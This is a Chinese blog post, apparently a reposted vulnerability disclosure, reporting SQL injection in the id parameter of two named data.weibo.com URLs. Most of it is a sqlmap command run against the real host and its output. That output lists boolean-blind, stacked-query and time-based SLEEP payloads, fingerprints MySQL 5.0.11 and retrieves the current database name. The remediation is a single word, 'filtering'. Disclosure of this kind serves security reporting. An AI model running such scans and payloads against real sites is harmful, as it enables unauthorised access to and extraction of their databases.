新浪微博某站点SQL注入两处

漏洞url

id参数存在注入
http://data.weibo.com/report/analystarticle?id=2205075871
http://data.weibo.com/report/reportDetail?id=193
D:\sqlmap>sqlmap -u "http://data.weibo.com/report/analystarticle?id=2131772313"
--current-db

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program

[*] starting at 17:03:15

[17:03:16] [INFO] using 'D:\sqlmap\output\data.weibo.com\session' as session fil
e
[17:03:16] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[17:03:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2131772313 AND 1282=1282

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: id=2131772313; SELECT SLEEP(5);#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2131772313 AND SLEEP(5)
---

[17:03:17] [INFO] the back-end DBMS is MySQL

web application technology: Apache
back-end DBMS: MySQL 5.0.11
[17:03:17] [INFO] fetching current database
[17:03:17] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[17:03:17] [INFO] retrieved: distribute_multi_issue
current database:    'distribute_multi_issue'

 

新浪微博某站点SQL注入两处 – 网站安全 – 自学php网插图

 

新浪微博某站点SQL注入两处 – 网站安全 – 自学php网插图1

一些表
 

新浪微博某站点SQL注入两处 – 网站安全 – 自学php网插图2

解决方案:

过滤

    上一篇: web 安全实践(1)基于http的架构分析常用工具 - 网站安全 - 自学php网

    下一篇: wordpress账户防暴力破解攻击 - 网站安全 - 自学php网
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《新浪微博某站点SQL注入两处 – 网站安全 – 自学php网
   

还没有人抢沙发呢~